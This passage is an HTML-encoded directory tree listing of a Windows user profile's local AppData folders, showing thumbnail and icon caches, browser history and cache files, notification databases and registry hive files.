&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_256.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_32.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_48.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_768.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_96.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_custom_stream.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_exif.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_idx.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_sr.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_wide_alternate.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; iconcache_wide.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_1280.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_16.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_1920.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_2560.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_256.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_32.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_48.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_768.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_96.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_custom_stream.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_exif.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_idx.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_sr.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; thumbcache_wide_alternate.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; thumbcache_wide.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; History
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; desktop.ini
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; History.IE5
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; MSHist012025081120250818
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; MSHist012025082020250821
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; INetCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; IE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 4EYSJFY3
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 7895f72cb31f74094c5032cb5b149cca7cb7cb14[1].xml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 7895f72cb31f74094c5032cb5b149cca7cb7cb14[2].xml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; oneds-analytics-js_v2_9966a2b9a2d7598281cd[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; HOCYMRRE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 7895f72cb31f74094c5032cb5b149cca7cb7cb14[1].xml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; login_v2_en_1t6O2Deo9lZx_hfJgz2nvQ2[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; PreSignInSettingsConfig[1].json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; SER34BP8
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; legacy-polyfill_FPpelzeB5wf7OuEuISCrCA2[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; microsoft_logo_ee5c8d9fb6248c938fd0[1].svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Windows[1].json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; SI2SB0ME
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 21.220.1024[1].json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; fabric-chunk_vendors_3AuhqAH6urzCMdrL7EL03Q2[1].js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; Windows[1].json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; INetCookies
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ESE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; container.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Notifications
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; wpndatabase.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; wpndatabase.db-shm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; wpndatabase.db-wal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WPNPRMRY.tmp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; PowerShell
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ModuleAnalysisCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Safety
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; edge
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; local
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; local
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; cache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; remote
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; script
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; script_300161259571223429446516194326035503227.rel.v2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; synchronousLookupUris
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; synchronousLookupUris_638343870221005468
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; topTraffic
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; topTraffic_638004170464094982
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; shell
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; remote
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; script
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; script_96032244749497702726114603847611723578.rel.v2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Shell
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; DefaultLayouts.xml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UsrClass.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UsrClass.dat{ccfd4875-7a1d-11f0-9f88-005056b4d166}.TM.blf
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UsrClass.dat{ccfd4875-7a1d-11f0-9f88-005056b4d166}.TMContainer00000000000000000001.regtrans-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UsrClass.dat{ccfd4875-7a1d-11f0-9f88-005056b4d166}.TMContainer00000000000000000002.regtrans-ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UsrClass.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UsrClass.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WebCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; V0100005.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; V01.chk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; V01.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; V01res00001.jrs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; V01res00002.jrs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; V01tmp.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WebCacheV01.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WebCacheV01.jfm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WebCacheLock.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WinX
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Group1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1 - Desktop.lnk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; desktop.ini
